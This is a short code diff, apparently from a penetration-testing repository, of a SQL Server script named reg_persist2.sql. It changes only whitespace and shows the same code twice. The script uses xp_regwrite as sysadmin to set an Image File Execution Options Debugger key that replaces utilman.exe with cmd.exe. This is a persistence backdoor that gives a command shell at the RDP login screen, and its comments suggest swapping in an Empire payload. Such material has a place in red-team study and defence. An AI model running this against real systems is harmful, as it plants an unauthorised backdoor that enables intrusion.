nullbind · September 16, 2019 04:58
diff --git a/reg_persist2.sql b/reg_persist2.sql
 -- This will create a registry key through SQL Server (as sysadmin)
 -- to run a defined debugger (any command) instead of intended command
 -- in the example utilman.exe can be replace with cmd.exe and executed on demand via rdp
 --- note: this could easily be a empire/other payload
 EXEC master..xp_regwrite
 @rootkey     = 'HKEY_LOCAL_MACHINE',
 @key         = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe',
 @value_name  = 'Debugger',
 @type        = 'REG_SZ',
 @value       = '"c:\windows\system32\cmd.exe"'
	-- This will create a registry key through SQL Server (as sysadmin)
	-- to run a defined debugger (any command) instead of intended command
	-- in the example utilman.exe can be replace with cmd.exe and executed on demand via rdp
	--- note: this could easily be a empire/other payload
	EXEC master..xp_regwrite
	@rootkey = 'HKEY_LOCAL_MACHINE',
	@key = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe',
	@value_name = 'Debugger',
	@type = 'REG_SZ',
	@value = '"c:\windows\system32\cmd.exe"'